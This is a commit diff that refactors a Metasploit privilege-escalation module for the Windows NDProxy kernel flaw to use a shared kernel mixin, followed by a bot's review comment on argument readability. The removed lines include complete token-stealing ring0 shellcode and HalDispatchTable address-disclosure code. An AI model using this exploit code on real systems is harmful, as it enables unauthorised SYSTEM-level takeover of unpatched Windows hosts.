Switch ms_ndproxy to use the new WindowsKernel mixin
parent
58d29167e8
commit
86e2377218
|
@ -4,11 +4,13 @@
|
|||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'msf/core/exploit/local/windows_kernel'
|
||||
require 'rex'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Local
|
||||
Rank = AverageRanking
|
||||
|
||||
include Msf::Exploit::Local::WindowsKernel
|
||||
include Msf::Post::File
|
||||
include Msf::Post::Windows::Priv
|
||||
include Msf::Post::Windows::Process
|
||||
|
@ -84,63 +86,6 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
'DisclosureDate'=> 'Nov 27 2013',
|
||||
'DefaultTarget' => 0
|
||||
}))
|
||||
|
||||
end
|
||||
|
||||
def add_railgun_functions
|
||||
session.railgun.add_dll('psapi') unless session.railgun.dlls.keys.include?('psapi')
|
||||
session.railgun.add_function(
|
||||
'psapi',
|
||||
'EnumDeviceDrivers',
|
||||
'BOOL',
|
||||
[
|
||||
["PBLOB", "lpImageBase", "out"],
|
||||
["DWORD", "cb", "in"],
|
||||
["PDWORD", "lpcbNeeded", "out"]
|
||||
])
|
||||
session.railgun.add_function(
|
||||
'psapi',
|
||||
'GetDeviceDriverBaseNameA',
|
||||
'DWORD',
|
||||
[
|
||||
["LPVOID", "ImageBase", "in"],
|
||||
["PBLOB", "lpBaseName", "out"],
|
||||
["DWORD", "nSize", "in"]
|
||||
])
|
||||
end
|
||||
|
||||
def open_device(dev)
|
||||
|
||||
invalid_handle_value = 0xFFFFFFFF
|
||||
|
||||
r = session.railgun.kernel32.CreateFileA(dev, 0x0, 0x0, nil, 0x3, 0, 0)
|
||||
|
||||
handle = r['return']
|
||||
|
||||
if handle == invalid_handle_value
|
||||
return nil
|
||||
end
|
||||
|
||||
return handle
|
||||
end
|
||||
|
||||
def find_sys_base(drvname)
|
||||
results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4)
|
||||
addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack("L*")
|
||||
|
||||
addresses.each do |address|
|
||||
results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)
|
||||
current_drvname = results['lpBaseName'][0..results['return'] - 1]
|
||||
if drvname == nil
|
||||
if current_drvname.downcase.include?('krnl')
|
||||
return [address, current_drvname]
|
||||
end
|
||||
elsif drvname == results['lpBaseName'][0..results['return'] - 1]
|
||||
return [address, current_drvname]
|
||||
end
|
||||
end
|
||||
|
||||
return nil
|
||||
end
|
||||
|
||||
def ring0_shellcode(t)
|
||||
|
@ -148,25 +93,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
restore_ptrs << "\xb8" + [ @addresses["HaliQuerySystemInfo"] ].pack("L") # mov eax, offset hal!HaliQuerySystemInformation
|
||||
restore_ptrs << "\xa3" + [ @addresses["halDispatchTable"] + 4 ].pack("L") # mov dword ptr [nt!HalDispatchTable+0x4], eax
|
||||
|
||||
tokenstealing = "\x52" # push edx # Save edx on the stack
|
||||
tokenstealing << "\x53" # push ebx # Save ebx on the stack
|
||||
tokenstealing << "\x33\xc0" # xor eax, eax # eax = 0
|
||||
tokenstealing << "\x64\x8b\x80\x24\x01\x00\x00" # mov eax, dword ptr fs:[eax+124h] # Retrieve ETHREAD
|
||||
tokenstealing << "\x8b\x40" + t['_KPROCESS'] # mov eax, dword ptr [eax+44h] # Retrieve _KPROCESS
|
||||
tokenstealing << "\x8b\xc8" # mov ecx, eax
|
||||
tokenstealing << "\x8b\x98" + t['_TOKEN'] + "\x00\x00\x00" # mov ebx, dword ptr [eax+0C8h] # Retrieves TOKEN
|
||||
tokenstealing << "\x8b\x80" + t['_APLINKS'] + "\x00\x00\x00" # mov eax, dword ptr [eax+88h] <====| # Retrieve FLINK from ActiveProcessLinks
|
||||
tokenstealing << "\x81\xe8" + t['_APLINKS'] + "\x00\x00\x00" # sub eax,88h | # Retrieve _EPROCESS Pointer from the ActiveProcessLinks
|
||||
tokenstealing << "\x81\xb8" + t['_UPID'] + "\x00\x00\x00\x04\x00\x00\x00" # cmp dword ptr [eax+84h], 4 | # Compares UniqueProcessId with 4 (The System Process on Windows XP)
|
||||
tokenstealing << "\x75\xe8" # jne 0000101e ======================
|
||||
tokenstealing << "\x8b\x90" + t['_TOKEN'] + "\x00\x00\x00" # mov edx,dword ptr [eax+0C8h] # Retrieves TOKEN and stores on EDX
|
||||
tokenstealing << "\x8b\xc1" # mov eax, ecx # Retrieves KPROCESS stored on ECX
|
||||
tokenstealing << "\x89\x90" + t['_TOKEN'] + "\x00\x00\x00" # mov dword ptr [eax+0C8h],edx # Overwrites the TOKEN for the current KPROCESS
|
||||
tokenstealing << "\x5b" # pop ebx # Restores ebx
|
||||
tokenstealing << "\x5a" # pop edx # Restores edx
|
||||
tokenstealing << "\xc2\x10" # ret 10h # Away from the kernel!
|
||||
|
||||
ring0_shellcode = restore_ptrs + tokenstealing
|
||||
ring0_shellcode = restore_ptrs + token_stealing_shellcode(t)
|
||||
return ring0_shellcode
|
||||
end
|
||||
|
||||
|
@ -211,33 +138,8 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
def disclose_addresses(t)
|
||||
addresses = {}
|
||||
|
||||
vprint_status("Getting the Kernel module name...")
|
||||
kernel_info = find_sys_base(nil)
|
||||
if kernel_info.nil?
|
||||
vprint_error("Failed to disclose the Kernel module name")
|
||||
return nil
|
||||
end
|
||||
vprint_good("Kernel module found: #{kernel_info[1]}")
|
||||
|
||||
vprint_status("Getting a Kernel handle...")
|
||||
kernel32_handle = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1)
|
||||
kernel32_handle = kernel32_handle['return']
|
||||
if kernel32_handle == 0
|
||||
vprint_error("Failed to get a Kernel handle")
|
||||
return nil
|
||||
end
|
||||
vprint_good("Kernel handle acquired")
|
||||
|
||||
|
||||
vprint_status("Disclosing the HalDispatchTable...")
|
||||
hal_dispatch_table = session.railgun.kernel32.GetProcAddress(kernel32_handle, "HalDispatchTable")
|
||||
hal_dispatch_table = hal_dispatch_table['return']
|
||||
if hal_dispatch_table == 0
|
||||
vprint_error("Failed to disclose the HalDispatchTable")
|
||||
return nil
|
||||
end
|
||||
hal_dispatch_table -= kernel32_handle
|
||||
hal_dispatch_table += kernel_info[0]
|
||||
hal_dispatch_table = find_haldispatchtable
|
||||
return nil if hal_dispatch_table.nil?
|
||||
addresses["halDispatchTable"] = hal_dispatch_table
|
||||
vprint_good("HalDispatchTable found at 0x#{addresses["halDispatchTable"].to_s(16)}")
|
||||
|
||||
|
@ -257,16 +159,12 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
return addresses
|
||||
end
|
||||
|
||||
|
||||
def check
|
||||
vprint_status("Adding the railgun stuff...")
|
||||
add_railgun_functions
|
||||
|
||||
if sysinfo["Architecture"] =~ /wow64/i or sysinfo["Architecture"] =~ /x64/
|
||||
return Exploit::CheckCode::Detected
|
||||
end
|
||||
|
||||
handle = open_device("\\\\.\\NDProxy")
|
||||
handle = open_device("\\\\.\\NDProxy", 0x0, 0x0, 0x3)
|
||||
if handle.nil?
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
@ -289,10 +187,6 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
end
|
||||
|
||||
def exploit
|
||||
|
||||
vprint_status("Adding the railgun stuff...")
|
||||
add_railgun_functions
|
||||
|
||||
if sysinfo["Architecture"] =~ /wow64/i
|
||||
fail_with(Failure::NoTarget, "Running against WOW64 is not supported")
|
||||
elsif sysinfo["Architecture"] =~ /x64/
|
||||
|
@ -322,7 +216,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
end
|
||||
|
||||
print_status("Checking device...")
|
||||
handle = open_device("\\\\.\\NDProxy")
|
||||
handle = open_device("\\\\.\\NDProxy", 0x0, 0x0, 0x3)
|
||||
if handle.nil?
|
||||
fail_with(Failure::NoTarget, "\\\\.\\NDProxy device not found")
|
||||
else
|
||||
|
@ -409,9 +303,5 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
else
|
||||
fail_with(Failure::Unknown, "Error while executing the payload")
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
|
|
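Review bot: The two new `open_device("\\\\.\\NDProxy", 0x0, 0x0, 0x3)` calls, one in `check` and one in `exploit`, pass three bare literals whose meaning can only be recovered from the removed local helper, which forwarded the same values to `CreateFileA` as desired access, share mode and creation disposition. I would put a comment above each call, `# desired_access = 0, share_mode = 0, creation_disposition = 0x3 (OPEN_EXISTING)`, or move the call into one private helper so the values are stated once. The mixin itself is not part of this page, so the parameter order is inferred from the removed code and should be confirmed against `Msf::Exploit::Local::WindowsKernel`. Both methods continue outside the visible hunks, so it cannot be confirmed from here whether the returned handle is closed on every path.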